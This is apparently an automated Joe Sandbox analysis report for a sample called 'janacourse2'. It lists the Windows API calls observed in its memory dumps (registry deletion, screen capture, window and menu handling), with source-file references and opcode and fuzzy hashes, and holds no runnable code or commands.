                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,0104FC38,?), ref: 01048611
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 01048621
                                                                                                            • GetObjectW.GDI32(?,00000018,000000FF), ref: 01048641
                                                                                                            • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 01048671
                                                                                                            • DeleteObject.GDI32(00000000), ref: 01048699
                                                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 010486AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                            • String ID:
                                                                                                            • API String ID: 3840717409-0
                                                                                                            • Opcode ID: 17ccb7cb7495f71ef0177053ca538e0abb4b2e8c270cf10943bbcfc42efb0864
                                                                                                            • Instruction ID: 665535d358d681a449629988a202187071508a0efedd70e84b77574a22e76ba5
                                                                                                            • Opcode Fuzzy Hash: 17ccb7cb7495f71ef0177053ca538e0abb4b2e8c270cf10943bbcfc42efb0864
                                                                                                            • Instruction Fuzzy Hash: D14151B5601204BFE721DFA9CE88EAE7BB8FF89711F008469F949E7250D7759901CB60
                                                                                                            APIs
                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 01021502
                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0102150B
                                                                                                            • VariantClear.OLEAUT32(?), ref: 01021517
                                                                                                            • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 010215FB
                                                                                                            • VarR8FromDec.OLEAUT32(?,?), ref: 01021657
                                                                                                            • VariantInit.OLEAUT32(?), ref: 01021708
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 0102178C
                                                                                                            • VariantClear.OLEAUT32(?), ref: 010217D8
                                                                                                            • VariantClear.OLEAUT32(?), ref: 010217E7
                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 01021823
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                            • API String ID: 1234038744-3931177956
                                                                                                            • Opcode ID: 132cb67120dbbf25f423e4c111936f16e93f5fe3b8cecc690fcbf021260adbc0
                                                                                                            • Instruction ID: f0b9a11fc2477efdb80679a070d03574731df128d0075117eb83fa9d5a23c5fa
                                                                                                            • Opcode Fuzzy Hash: 132cb67120dbbf25f423e4c111936f16e93f5fe3b8cecc690fcbf021260adbc0
                                                                                                            • Instruction Fuzzy Hash: CDD11571A00235DBEB149F65D985BBDBBF5BF04700F0880DAF596AB180DB38E845DBA1
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                              • Part of subcall function 0103C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0103B6AE,?,?), ref: 0103C9B5
                                                                                                              • Part of subcall function 0103C998: _wcslen.LIBCMT ref: 0103C9F1
                                                                                                              • Part of subcall function 0103C998: _wcslen.LIBCMT ref: 0103CA68
                                                                                                              • Part of subcall function 0103C998: _wcslen.LIBCMT ref: 0103CA9E
                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0103B6F4
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0103B772
                                                                                                            • RegDeleteValueW.ADVAPI32(?,?), ref: 0103B80A
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0103B87E
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0103B89C
                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0103B8F2
                                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0103B904
                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 0103B922
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0103B983
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0103B994
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                            • API String ID: 146587525-4033151799
                                                                                                            • Opcode ID: 9b5ba80e29ed811f4ede6cbc569f1d33f3662a5fe76a287463eb9b6e6ca76bc0
                                                                                                            • Instruction ID: 3cf8cec51e34568a2c64647fd6a5d5f7743616e03835d620d5edd8d08c64fb38
                                                                                                            • Opcode Fuzzy Hash: 9b5ba80e29ed811f4ede6cbc569f1d33f3662a5fe76a287463eb9b6e6ca76bc0
                                                                                                            • Instruction Fuzzy Hash: 91C1AF34204201AFE720DF19C895F6ABBE5FF85308F18849DF59A8B292CB75E845CF91
                                                                                                            APIs
                                                                                                            • GetDC.USER32(00000000), ref: 010325D8
                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 010325E8
                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 010325F4
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 01032601
                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0103266D
                                                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 010326AC
                                                                                                            • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 010326D0
                                                                                                            • SelectObject.GDI32(?,?), ref: 010326D8
                                                                                                            • DeleteObject.GDI32(?), ref: 010326E1
                                                                                                            • DeleteDC.GDI32(?), ref: 010326E8
                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 010326F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                            • String ID: (
                                                                                                            • API String ID: 2598888154-3887548279
                                                                                                            • Opcode ID: e29da37f7c921e1799119d7b04e73bbb639e3789e0c2c0ff580ce094a76b9043
                                                                                                            • Instruction ID: 81b8627f643561efed6c499d07a028b66fe24966f8cf57d4fccf47814520ae51
                                                                                                            • Opcode Fuzzy Hash: e29da37f7c921e1799119d7b04e73bbb639e3789e0c2c0ff580ce094a76b9043
                                                                                                            • Instruction Fuzzy Hash: 9C6113B5D00219EFDF15CFA4C984AAEBBB9FF48310F208529E995A7250D775A940CF50
                                                                                                            APIs
                                                                                                            • ___free_lconv_mon.LIBCMT ref: 00FEDAA1
                                                                                                              • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED659
                                                                                                              • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED66B
                                                                                                              • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED67D
                                                                                                              • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED68F
                                                                                                              • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED6A1
                                                                                                              • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED6B3
                                                                                                              • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED6C5
                                                                                                              • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED6D7
                                                                                                              • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED6E9
                                                                                                              • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED6FB
                                                                                                              • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED70D
                                                                                                              • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED71F
                                                                                                              • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED731
                                                                                                            • _free.LIBCMT ref: 00FEDA96
                                                                                                              • Part of subcall function 00FE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000), ref: 00FE29DE
                                                                                                              • Part of subcall function 00FE29C8: GetLastError.KERNEL32(00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000,00000000), ref: 00FE29F0
                                                                                                            • _free.LIBCMT ref: 00FEDAB8
                                                                                                            • _free.LIBCMT ref: 00FEDACD
                                                                                                            • _free.LIBCMT ref: 00FEDAD8
                                                                                                            • _free.LIBCMT ref: 00FEDAFA
                                                                                                            • _free.LIBCMT ref: 00FEDB0D
                                                                                                            • _free.LIBCMT ref: 00FEDB1B
                                                                                                            • _free.LIBCMT ref: 00FEDB26
                                                                                                            • _free.LIBCMT ref: 00FEDB5E
                                                                                                            • _free.LIBCMT ref: 00FEDB65
                                                                                                            • _free.LIBCMT ref: 00FEDB82
                                                                                                            • _free.LIBCMT ref: 00FEDB9A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                            • String ID:
                                                                                                            • API String ID: 161543041-0
                                                                                                            • Opcode ID: b4973bf0b097167acb3c3e063f432836509675b663a4bbe9793e3f268e849a77
                                                                                                            • Instruction ID: 90c73366e794c1a2fd6da5dc857c3eed12fdfed3c76830ca41cc49df1f2d23b2
                                                                                                            • Opcode Fuzzy Hash: b4973bf0b097167acb3c3e063f432836509675b663a4bbe9793e3f268e849a77
                                                                                                            • Instruction Fuzzy Hash: 06319F31A043899FEB61AA3AEC42B5A77E8FF40320F114429E058D7592EF39ED40F721
                                                                                                            APIs
                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0101369C
                                                                                                            • _wcslen.LIBCMT ref: 010136A7
                                                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 01013797
                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 0101380C
                                                                                                            • GetDlgCtrlID.USER32(?), ref: 0101385D
                                                                                                            • GetWindowRect.USER32(?,?), ref: 01013882
                                                                                                            • GetParent.USER32(?), ref: 010138A0
                                                                                                            • ScreenToClient.USER32(00000000), ref: 010138A7
                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 01013921
                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0101395D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                                            • String ID: %s%u
                                                                                                            • API String ID: 4010501982-679674701
                                                                                                            • Opcode ID: faf3805b0603e55a9c9966c5b5f62f1c74efd95fa61ea7af93c5997e694a2903
                                                                                                            • Instruction ID: 4c8188c995d83e03ec1b814bab1f14f32a656333890f7330b7e42a2e7afbfa59
                                                                                                            • Opcode Fuzzy Hash: faf3805b0603e55a9c9966c5b5f62f1c74efd95fa61ea7af93c5997e694a2903
                                                                                                            • Instruction Fuzzy Hash: 6491B171204206AFE719DF28C884BEAF7E9FF44360F008529FAD9D6184DB38A545CB91
                                                                                                            APIs
                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 01014994
                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 010149DA
                                                                                                            • _wcslen.LIBCMT ref: 010149EB
                                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 010149F7
                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 01014A2C
                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 01014A64
                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 01014A9D
                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 01014AE6
                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 01014B20
                                                                                                            • GetWindowRect.USER32(?,?), ref: 01014B8B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                            • String ID: ThumbnailClass
                                                                                                            • API String ID: 1311036022-1241985126
                                                                                                            • Opcode ID: 3c97d3ac86eb7ebafa67fdaeae8a14f2bf23977036f5301e7bfa37471a29b74e
                                                                                                            • Instruction ID: d08d1b6c3b7c9335ac261174cd3f325abfd0e266c89c57fac04e51c0bc067ac8
                                                                                                            • Opcode Fuzzy Hash: 3c97d3ac86eb7ebafa67fdaeae8a14f2bf23977036f5301e7bfa37471a29b74e
                                                                                                            • Instruction Fuzzy Hash: 2391B2710042059FEB15DF18C984BAA7BE9FF44314F0484A9FEC5DA1AADB38E945CBA1
                                                                                                            APIs
                                                                                                            • GetMenuItemInfoW.USER32(01081990,000000FF,00000000,00000030), ref: 0101BFAC
                                                                                                            • SetMenuItemInfoW.USER32(01081990,00000004,00000000,00000030), ref: 0101BFE1
                                                                                                            • Sleep.KERNEL32(000001F4), ref: 0101BFF3
                                                                                                            • GetMenuItemCount.USER32(?), ref: 0101C039
                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 0101C056
                                                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 0101C082
                                                                                                            • GetMenuItemID.USER32(?,?), ref: 0101C0C9
                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0101C10F
                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0101C124
                                                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0101C145
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 1460738036-4108050209
                                                                                                            • Opcode ID: 34e06f60d5d6d2152a2dfb5e7fb121c98e38049168c31cdfbb41012d1c4ea817
                                                                                                            • Instruction ID: 405788cbb811c02dd9661faf74d3ca315d6810072feaba64ff389feb48f79115
                                                                                                            • Opcode Fuzzy Hash: 34e06f60d5d6d2152a2dfb5e7fb121c98e38049168c31cdfbb41012d1c4ea817
                                                                                                            • Instruction Fuzzy Hash: 066184B0940246AFFF21CF68CA88AEE7FB4FB46344F044155F991A3245C739E945CB60
                                                                                                            APIs
                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0103CC64
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0103CC8D
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0103CD48
                                                                                                              • Part of subcall function 0103CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0103CCAA
                                                                                                              • Part of subcall function 0103CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0103CCBD
                                                                                                              • Part of subcall function 0103CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0103CCCF
                                                                                                              • Part of subcall function 0103CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0103CD05
                                                                                                              • Part of subcall function 0103CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0103CD28
                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 0103CCF3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                            • API String ID: 2734957052-4033151799
                                                                                                            • Opcode ID: 38fc5f615258d1eb852bbb363066371d299e778db7fd842e29edaf6154670a60
                                                                                                            • Instruction ID: 060f28e66b44d27fc37b070ac37edd57ed40b400f54076f62488ccfc42254b21
                                                                                                            • Opcode Fuzzy Hash: 38fc5f615258d1eb852bbb363066371d299e778db7fd842e29edaf6154670a60
                                                                                                            • Instruction Fuzzy Hash: 813182B5902129BBF7319A55DE88EFFBFBCEF46640F000166F981E2104DA349A45DBA0
                                                                                                            APIs
                                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 01023D40
                                                                                                            • _wcslen.LIBCMT ref: 01023D6D
                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 01023D9D
                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 01023DBE
                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 01023DCE
                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 01023E55
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 01023E60
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 01023E6B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                            • String ID: :$\$\??\%s
                                                                                                            • API String ID: 1149970189-3457252023
                                                                                                            • Opcode ID: 5675cdd8f49108b7ea4f6927b9acfbea62852f8dfc2f095afd5d94758c7ef34a
                                                                                                            • Instruction ID: d39aca26f33015cf4123b197490a038a9052862d53daf4a3d6abcad91b84c09a
                                                                                                            • Opcode Fuzzy Hash: 5675cdd8f49108b7ea4f6927b9acfbea62852f8dfc2f095afd5d94758c7ef34a
                                                                                                            • Instruction Fuzzy Hash: BA31D6B6A00119ABEB219BA4DD85FEF37BDFF88700F1040B5F649D6154E77892448B24
                                                                                                            APIs
                                                                                                            • timeGetTime.WINMM ref: 0101E6B4
                                                                                                              • Part of subcall function 00FCE551: timeGetTime.WINMM(?,?,0101E6D4), ref: 00FCE555
                                                                                                            • Sleep.KERNEL32(0000000A), ref: 0101E6E1
                                                                                                            • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0101E705
                                                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0101E727
                                                                                                            • SetActiveWindow.USER32 ref: 0101E746
                                                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0101E754
                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0101E773
                                                                                                            • Sleep.KERNEL32(000000FA), ref: 0101E77E
                                                                                                            • IsWindow.USER32 ref: 0101E78A
                                                                                                            • EndDialog.USER32(00000000), ref: 0101E79B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                            • String ID: BUTTON
                                                                                                            • API String ID: 1194449130-3405671355
                                                                                                            • Opcode ID: 20ac09bf909059a9f895da78a0a079f1c91c4e51a717cf3cae03fd56d4402c6d
                                                                                                            • Instruction ID: c09d88374141d1a6abcff21b339036f933603da3feded4289777ce888040d35b
                                                                                                            • Opcode Fuzzy Hash: 20ac09bf909059a9f895da78a0a079f1c91c4e51a717cf3cae03fd56d4402c6d
                                                                                                            • Instruction Fuzzy Hash: 382162B5205205AFFB225F64EEC9A2D3BA9FB49788B444424F9C18215DDB7FAC20CB54
                                                                                                            APIs
